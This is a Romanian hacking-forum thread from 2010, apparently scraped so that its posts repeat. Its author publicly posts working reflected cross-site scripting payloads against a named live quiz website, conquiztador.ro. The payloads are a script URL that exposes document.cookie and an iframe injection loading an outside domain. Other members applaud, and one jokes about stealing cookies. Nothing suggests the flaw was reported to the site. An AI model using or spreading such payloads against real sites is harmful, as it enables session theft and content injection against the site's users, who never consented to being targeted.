www.conquiztador.ro

Ne0h · 01-04-2010, 11:18 AM

XSS Screen:

Proof of Concept:

Code:

http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E

Iframe Screen:

Iframe Injection:

Code:

http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E

immun3 · 01-04-2010, 11:43 AM

foarte tare

go_sword · 01-04-2010, 12:46 PM

o nu..nu iarasi conquiztador..nuuu
anyway..bv

Ne0h · 01-04-2010, 12:51 PM

Mersi frumos.

Hertz · 01-04-2010, 01:32 PM

Mai joaca cineva conpizdador?
Hai sa furam cookieuri nu. =]

Ne0h · 01-04-2010, 01:51 PM

Era mai interesant un SQLi,dar nu mai sunt,sau cel putin nu am mai gasit eu.

SympleBoy22 · 01-04-2010, 03:52 PM

Asta face parte din xss-urile alea de care mi-ai zis?

Ne0h · 01-04-2010, 04:05 PM

Nu,astazi l-am gasit.

SirGod · 01-04-2010, 04:11 PM

Si ma rog de ce faci si un PoC cu iframe?Ce vrei sa demonstrezi cu aia?Care isi e rostul?Am vazut ca e XSS.Nu trebuie sa bagi iframe,marquee si altele.

Ne0h · 01-04-2010, 04:22 PM

Nu toti stiu si de iframe asa ca il adaug si pe el,nu deranjeaza pe nimeni.Sau te deranjeaza?

01-04-2010, 11:18 AM	#1 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 2	www.conquiztador.ro hotel regim hotelier hotel yahoo domain XSS Screen: Proof of Concept: Code: http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E Iframe Screen: Iframe Injection: Code: http://www.conquiztador.ro/clientstart.php?tg=1&whall=1%22%3E%3Ciframe%20src=http://ne0h.baywords.com%3E%3C/iframe%3E __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 12:46 PM	#3 (permalink)
go_sword Registered Users Bautor de whiskey Join Date: Nov 2006 Posts: 382 Rep Power: 4	o nu..nu iarasi conquiztador..nuuu anyway..bv __________________ teoria furaciunii

01-04-2010, 12:51 PM	#4 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 2	Mersi frumos. __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 01:32 PM	#5 (permalink)
Hertz Registered user Cultul betivilor Join Date: Feb 2008 Location: Romania Posts: 1,125 Rep Power: 0	Mai joaca cineva conpizdador? Hai sa furam cookieuri nu. =] __________________ http://x0hertz.wordpress.com/

01-04-2010, 01:51 PM	#6 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 2	Era mai interesant un SQLi,dar nu mai sunt,sau cel putin nu am mai gasit eu. __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 11:43 AM	#2 (permalink)
immun3 Registered Users Bautor de palinca Join Date: May 2008 Posts: 116 Rep Power: 3	foarte tare

01-04-2010, 03:52 PM	#7 (permalink)
SympleBoy22 Registered user Cultul betivilor Join Date: Sep 2009 Location: htdocs Posts: 1,332 Rep Power: 2	Asta face parte din xss-urile alea de care mi-ai zis? __________________ hu ză fack iz alexandrina ? da187cc9d3d4852d5e59e468b826a6ffb78966dc

01-04-2010, 04:05 PM	#8 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 2	Nu,astazi l-am gasit. __________________ "Social engineering bypasses all technologies, including firewalls."

01-04-2010, 04:11 PM	#9 (permalink)
SirGod Registered Users Bautor de whiskey Join Date: Nov 2007 Location: Rm.Valcea Posts: 356 Rep Power: 3	Si ma rog de ce faci si un PoC cu iframe?Ce vrei sa demonstrezi cu aia?Care isi e rostul?Am vazut ca e XSS.Nu trebuie sa bagi iframe,marquee si altele. __________________

01-04-2010, 04:22 PM	#10 (permalink)
Ne0h Registered user Bautor de whiskey Join Date: Aug 2009 Posts: 387 Rep Power: 2	Nu toti stiu si de iframe asa ca il adaug si pe el,nu deranjeaza pe nimeni.Sau te deranjeaza? __________________ "Social engineering bypasses all technologies, including firewalls."